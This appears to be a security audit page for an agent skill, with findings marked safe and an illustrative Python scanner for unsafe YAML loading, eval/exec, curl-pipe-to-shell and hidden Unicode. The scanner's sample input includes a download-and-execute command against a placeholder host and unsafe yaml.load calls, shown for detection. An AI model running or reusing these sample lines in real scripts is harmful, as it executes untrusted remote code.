tool-calling
Pass
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: LOW
Full Analysis
- [Data Exposure & Exfiltration] (SAFE): No hardcoded credentials, sensitive file paths, or unauthorized network operations were detected. The scripts only interact with the skill's own local configuration files.
- [Unverifiable Dependencies & Remote Code Execution] (SAFE): No remote code downloads (e.g., curl|bash) or execution of untrusted external scripts were found. The validation script uses standard libraries and the common PyYAML package.
- [Dynamic Execution] (SAFE): Both the validation script and the recommended design patterns correctly use yaml.safe_load() for parsing configuration. The safe loader only builds plain scalars, lists, and maps, so YAML tags that would construct arbitrary Python objects (as yaml.load() with a non-safe Loader allows) are rejected, which prevents unsafe deserialization attacks.
- [Prompt Injection] (SAFE): No instructions attempting to override agent behavior, bypass safety filters, or extract system prompts were identified.
- [Obfuscation] (SAFE): All files consist of clear, human-readable text and code without any hidden layers, encoded payloads, or homoglyph-based evasion techniques.
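To make the three code-level findings above concrete (Dynamic Execution, Unverifiable Dependencies & Remote Code Execution, Obfuscation), here is an added example of the kind of static check an auditor runs over a skill's files. It is illustrative code written for this page, not the Gen Agent Trust Hub's own tooling; the function names, the rule set, and the sample scripts and lines it scans are constructed for the example. It uses only the Python standard library, so it runs without PyYAML installed.

```python
"""Minimal static checks of the kind an agent-skill audit applies to scripts.

Added example, not the audit service's own code. Function names and rules are
hypothetical; the sample inputs at the bottom are constructed for this page.
"""
import ast
import re
import unicodedata

# Loaders that construct only scalars/lists/maps. FullLoader and Loader are
# deliberately absent: they are not a safe substitute for SafeLoader.
SAFE_LOADERS = {"SafeLoader", "CSafeLoader", "BaseLoader"}

# curl/wget output piped straight into a shell (the classic "curl | bash").
REMOTE_EXEC = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")


def _dotted_name(node):
    """'yaml.load' for Attribute(Name('yaml'), 'load'); 'eval' for Name('eval')."""
    if isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name):
        return f"{node.value.id}.{node.attr}"
    if isinstance(node, ast.Name):
        return node.id
    return None


def _loader_is_safe(call):
    """True only when yaml.load()/load_all() is given a loader from SAFE_LOADERS."""
    loader = None
    for kw in call.keywords:
        if kw.arg == "Loader":
            loader = kw.value
    if loader is None and len(call.args) >= 2:   # Loader passed positionally
        loader = call.args[1]
    if loader is None:                            # no Loader argument at all
        return False
    name = loader.attr if isinstance(loader, ast.Attribute) else getattr(loader, "id", None)
    return name in SAFE_LOADERS


def check_dynamic_execution(source):
    """Flag YAML deserialization that is not safe_load, plus eval()/exec()."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name in ("yaml.load", "yaml.load_all") and not _loader_is_safe(node):
            findings.append((node.lineno, f"{name} without a safe Loader"))
        elif name in ("yaml.unsafe_load", "yaml.unsafe_load_all",
                      "yaml.full_load", "yaml.full_load_all"):
            findings.append((node.lineno, f"{name} is not safe_load"))
        elif name in ("eval", "exec"):
            findings.append((node.lineno, f"{name}() on runtime data"))
    return findings


def check_remote_exec(text):
    """Line numbers where remote content is piped into a shell."""
    return [i for i, line in enumerate(text.splitlines(), 1) if REMOTE_EXEC.search(line)]


def check_hidden_text(text):
    """Flag invisible format controls (BiDi/zero-width) and non-ASCII letters.

    Non-ASCII letters in strings or comments are flagged too; the point is to
    surface anything a reviewer cannot see or could mistake for ASCII.
    """
    findings = []
    for i, line in enumerate(text.splitlines(), 1):
        for ch in line:
            if ord(ch) < 128:
                continue
            cat = unicodedata.category(ch)
            if cat == "Cf":                      # e.g. U+202E RIGHT-TO-LEFT OVERRIDE
                label = unicodedata.name(ch, f"U+{ord(ch):04X}")
                findings.append((i, f"format control {label}"))
            elif cat.startswith("L"):
                findings.append((i, f"non-ASCII letter {ch!r} (possible homoglyph)"))
    return findings


def audit(source):
    """Run all three checks over one file's text; empty lists mean 'SAFE'."""
    return {
        "dynamic_execution": check_dynamic_execution(source),
        "remote_execution": check_remote_exec(source),
        "obfuscation": check_hidden_text(source),
    }


# Constructed sample inputs (not files from the audited skill).
SAFE_SCRIPT = '''\
import yaml
with open("config.yaml") as f:
    cfg = yaml.safe_load(f)
'''

UNSAFE_SCRIPT = '''\
import yaml, os
cfg = yaml.load(open("config.yaml"))                           # no Loader at all
cfg2 = yaml.load(open("config.yaml"), Loader=yaml.FullLoader)  # not the safe loader
cfg3 = yaml.load(open("config.yaml"), Loader=yaml.SafeLoader)  # fine
os.system("curl -sSL https://example.invalid/install.sh | bash")
'''

TROJAN_LINE = "return_value = 0  # \u202e placeholder"   # hidden RLO control
HOMOGLYPH_LINE = "p\u0430ss = 'x'"                        # Cyrillic 'а', not Latin 'a'

if __name__ == "__main__":
    for label, src in (("safe", SAFE_SCRIPT), ("unsafe", UNSAFE_SCRIPT)):
        print(label, audit(src))
```

A script that passes these checks is not thereby proven safe; the audit's other categories (credential and path scanning, prompt-injection review) need their own rules, and a clean yaml.safe_load() call still has to be followed by validation of the values it returns.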
Audit Metadata